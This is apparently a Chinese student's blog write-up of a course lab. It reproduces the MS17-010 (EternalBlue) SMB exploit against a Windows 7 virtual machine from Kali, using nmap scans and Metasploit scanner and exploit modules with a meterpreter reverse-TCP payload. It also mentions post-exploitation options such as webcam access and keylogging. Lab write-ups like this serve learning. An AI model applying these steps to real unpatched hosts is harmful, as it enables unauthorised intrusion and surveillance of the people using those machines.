大二上工程实践-MS17010漏洞渗透测试萌新向

tmd,非要在期末搞这些。虽然以前写过MS17010复现文章,但是我年中的时候整黑苹果把磁盘给格式化了,5月到7月中旬的东西都没了。现在提起,还是有点小伤。其实如果不玩黑苹果的话,我也大概率不会买MacBook Pro?

这个实验不难,对于萌新来说,其实就是虚拟机安装和msf的几条命令了。

环境搭建

网络拓扑

我之前就安装好了kali(为了线下域渗透赛用cs…),现在基本已经脱离kali这玩意儿了,大部分内容都是mbp能做。这里就安装一下win7,并且演示如何开启445端口和有没有打补丁。

迅雷打开,复制下面的内容,就会弹窗让你下载。

1
ed2k://|file|cn_windows_7_enterprise_x64_dvd_x15-70741.iso|3203516416|876DCF115C2EE28D74B178BE1A84AB3B|/

直接把下载好的Windows7 拖进去就行了

点继续,输入你想设置的账号和密码,继续。

这步是让你是否要设置共享目录,为了安全,不设置。继续。

然后选择生成的虚拟机文件保存的路径,然后就会自动运行Windows7了。

等一会儿,就安装好了。

网络设置为NAT模式,Kali也是

kali的账号密码都是kali 和 kali。

查看kali linux ip 地址:为 192.168.226.166

你可以直接在Windows7 的cmd.exe 中运行 ipconfig 查看ip,也可以用nmap 探测 C段 主机存活情况。

我这里的192.168.226.167即为Windows7靶机的ip。探测结果如下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ sudo nmap -O 192.168.226.0/24 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-30 08:56 EST
Nmap scan report for 192.168.226.1
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
9090/tcp open zeus-admin
10000/tcp open snet-sensor-mgmt
MAC Address: 00:50:56:C0:00:08 (VMware)
Device type: phone|general purpose
Running: Apple iOS 11.X|12.X|13.X, Apple macOS 10.13.X|10.14.X|10.15.X
OS CPE: cpe:/o:apple:iphone_os:11 cpe:/o:apple:iphone_os:12 cpe:/o:apple:iphone_os:13 cpe:/o:apple:mac_os_x:10.13 cpe:/o:apple:mac_os_x:10.14 cpe:/o:apple:mac_os_x:10.15
OS details: Apple macOS 10.13 (High Sierra) - 10.15 (Catalina) or iOS 11.0 - 13.4 (Darwin 17.0.0 - 19.2.0)
Network Distance: 1 hop

Nmap scan report for 192.168.226.2
Host is up (0.00028s latency).
All 1000 scanned ports on 192.168.226.2 are closed
MAC Address: 00:50:56:FA:48:73 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running: VMware Player
OS CPE: cpe:/a:vmware:player
OS details: VMware Player virtual NAT device
Network Distance: 1 hop

Nmap scan report for 192.168.226.167
Host is up (0.00049s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
5357/tcp open wsdapi
MAC Address: 00:0C:29:8C:8C:76 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone
Running: Microsoft Windows 2008|8.1|7|Phone|Vista
OS CPE: cpe:/o:microsoft:windows_server_2008::beta3 cpe:/o:microsoft:windows_server_2008 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
OS details: Microsoft Windows Server 2008 or 2008 Beta 3, Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows 7 Professional or Windows 8, Microsoft Windows 8.1 R1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop

Nmap scan report for 192.168.226.254
Host is up (0.00026s latency).
All 1000 scanned ports on 192.168.226.254 are filtered
MAC Address: 00:50:56:F0:A0:AF (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

Nmap scan report for 192.168.226.166
Host is up (0.00011s latency).
All 1000 scanned ports on 192.168.226.166 are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (5 hosts up) scanned in 51.87 seconds

Windows7 下运行 cmd.exe

执行ipconfig命令查看ipv4地址

Windows7 能ping 通 kali:

这里直接手动关闭防火墙,来使两台机器互通。

关闭防火墙后,kali能ping通Windows7

Windows7 查看端口开放:

1
netstat -ano

可以看到这里的445端口是已默认开放了,所以不用去手动设置

nmap 扫常见端口:

1
nmap 192.168.26.167

445 端口开放。

查看Windows7 已打补丁:

1
2
3
wmic qfe
或者
systeminfo

可以看到是没有打补丁的。

漏洞利用

这里用kali linux 中的msf渗透框架来完成漏洞利用,到获取主机权限的过程。

简单介绍下msf吧,msf是用perl编写的,综合的渗透框架,包括辅助的信息搜集 、漏洞探测、验证、利用、后渗透模块。总之,学习攻防,就不可能不和msf打交道,就算你以后不用。

启动msf:

终端输入

1
msfconsole

启动msf

搜索与ms17 010 相关的模块

1
search ms17

搜索相关模块

Name下对应的 auxiliary、expoloit 对应的就是辅助模块和利用模块,然后右边的表示披露时间,评价,是否需要check,当然还有描述。

信息搜集是*本质。

先用辅助模块,来探测一下。这里会用到use命令。

1
use auxiliary/scanner/smb/smb_ms17_010

左边是一些参数、然后右边是yes 的话,就是说你要设置,是no,就不用设置。

然后是set命令。

1
set RHOSTS 192.168.226.167

然后run 或者exploit 命令来运行。

探测结果是存在ms17-010漏洞。

然后用漏洞利用模块,来获取这台Windows7机器的权限。

1
search ms17

如果没有设置payload,默认是使用windows/x64/meterpreter/reverse_tcp 这个获取反向tcp shell的payload。

就默认payload就行了。

set一下Windows7 靶机的ip,然后 exploit (run也行),开始利用,等一下,shell到手。

输入shell 进入meterpreter shell 命令行,这里我运行的shell whoami…. cs 用多了,见谅- -,

1
shell

可以看到是有乱码的,输入下面这个命令即可解决乱码问题。

1
chcp 65001

这个就是利用ms17-010,获取这台Windows7 主机的权限的过程。

如果还需要其他花样操作,比如开启3389,RDP过去,列文件,截屏,开启摄像头,键盘监控..这也很简单,也是几条命令。看知了堂他们怎么说吧,到时候在补充在这个文章里面。

但是如果时间充足,还是要去学习相关原理细节,深入理解,这方面,似乎我一直咕咕咕了。

所以文章到此结束。

Author: m0nk3y
Link: https://hack-for.fun/458f.html
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.